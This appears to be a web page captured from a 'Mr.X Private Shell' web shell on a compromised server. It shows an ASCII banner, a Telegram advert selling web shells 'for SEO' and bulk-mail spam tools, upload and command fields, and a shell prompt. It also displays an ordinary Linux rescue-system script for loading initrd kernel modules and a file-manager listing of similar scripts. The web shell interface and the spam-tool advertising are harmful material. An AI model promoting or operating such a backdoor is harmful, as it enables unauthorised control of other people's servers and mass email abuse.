����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# Modules loaded in the initrd should be also loaded in the rescue system
# It is important to load them in the same order to ensure the correct order of SCSI controllers
#
# We keep here all different types of initrd module configurations in a single script because
# distros switch tooling (e.g. SUSE adopted dracut) and otherwise we would end up with several
# symlinks.

# Old SUSE style
if test -s /etc/sysconfig/kernel ; then
    MODULES_LOAD+=(
      $(
        INITRD_MODULES=
        source /etc/sysconfig/kernel
        echo $INITRD_MODULES
      )
    )
fi

# Fedora, Red Hat & new SUSE uses dracut
if test -s /etc/dracut.conf ; then
    MODULES_LOAD+=(
        $(
            add_drivers=
            source /etc/dracut.conf
            for s in /etc/dracut.conf.d/*.conf ; do
                source $s
            done
            echo $add_drivers
        )
    )
fi

# Debian & Ubuntu use initramfs-tools and we include that as-is in 400_copy_modules.sh because we just
# append the initrd modules file to the general modules file. Nevertheless we must ensure that those
# modules are actually included in the rescue system
if test -s /etc/initramfs-tools/modules ; then
    MODULES_LOAD+=(
        $( sed -n -e 's/^\([A-Za-z0-9_-]\+\).*/\1/p' < /etc/initramfs-tools/modules )
    )
fi

: # set 0 as return value

Filemanager

Name Type Size Permission Actions
220_load_modules_from_initrd.sh File 1.3 KB 0644
230_storage_and_network_modules.sh File 1.7 KB 0644
240_kernel_modules.sh File 1.08 KB 0644
250_udev.sh File 449 B 0644
260_collect_initrd_modules.sh File 295 B 0644
260_storage_drivers.sh File 114 B 0644
290_kernel_cmdline.sh File 3.43 KB 0644
295_configure_ramdisk_rootfs.sh File 542 B 0644
300_dns.sh File 267 B 0644
310_network_devices.sh File 36.46 KB 0644
320_inet6.sh File 121 B 0644
350_routing.sh File 3.65 KB 0644
390_check_usb_modules.sh File 270 B 0644
410_use_xen_console.sh File 222 B 0644
500_clone_keyboard_mappings.sh File 6.97 KB 0644
550_copy_ldconfig.sh File 307 B 0644
950_cfg2html.sh File 1 KB 0644
960_collect_MC_serviceguard_infos.sh File 1.12 KB 0644
990_sysreqs.sh File 3.91 KB 0644